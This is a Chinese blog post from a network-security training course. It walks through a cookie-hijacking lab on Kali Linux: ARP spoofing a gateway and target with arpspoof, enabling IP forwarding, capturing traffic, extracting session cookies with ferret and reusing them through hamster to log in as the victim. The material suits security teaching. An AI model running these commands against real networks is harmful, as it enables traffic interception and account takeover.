网络安全实训课06cookies劫持

cookies劫持

1、首先保证虚拟机中的kali系统能够和外部网络通信

查看设置----虚拟网络编辑器----桥接无线网卡-------虚拟机有线设置DHCP
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2、ifconfig命令查看IP------ping测试

在这里插入图片描述
在这里插入图片描述

3、修改配置文件

vim /etc/apt/sources.list
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
在这里插入图片描述

4、 输入命令进行安装

dpkg --add-architecture i386 && apt-get update && apt-get install ferret-sidejack:i386
在这里插入图片描述
在这里插入图片描述

5、Zenmap扫描存活的主机

应用程序—信息收集–zenmap 可选
在这里插入图片描述

6、输入命令,开启kali路由转发功能

echo 1 > /proc/sys/net/ipv4/ip_forward
在这里插入图片描述

7、输入

arpspoof -i eth0 -t 网关 目标主机 中间人攻击
在这里插入图片描述

8、wireshark保存窃取的流量为.pacp文件

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在目标主机上登录相对应的网站,尽量选择安全性较低的,登录要留存过程

9、ferret -r 处理流量

生成cookies文件hamster.text
在这里插入图片描述

10、启动hamster

在这里插入图片描述

11、打开浏览器选项中设置代理为127.0.0.1::1234

在这里插入图片描述

12、地址栏输入127.0.0.1:1234

hamaster 找到目标IP ,登录目标用户的网站
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

发布了19 篇原创文章 · 获赞 1 · 访问量 499

猜你喜欢

转载自blog.csdn.net/Xunuannuan/article/details/103861102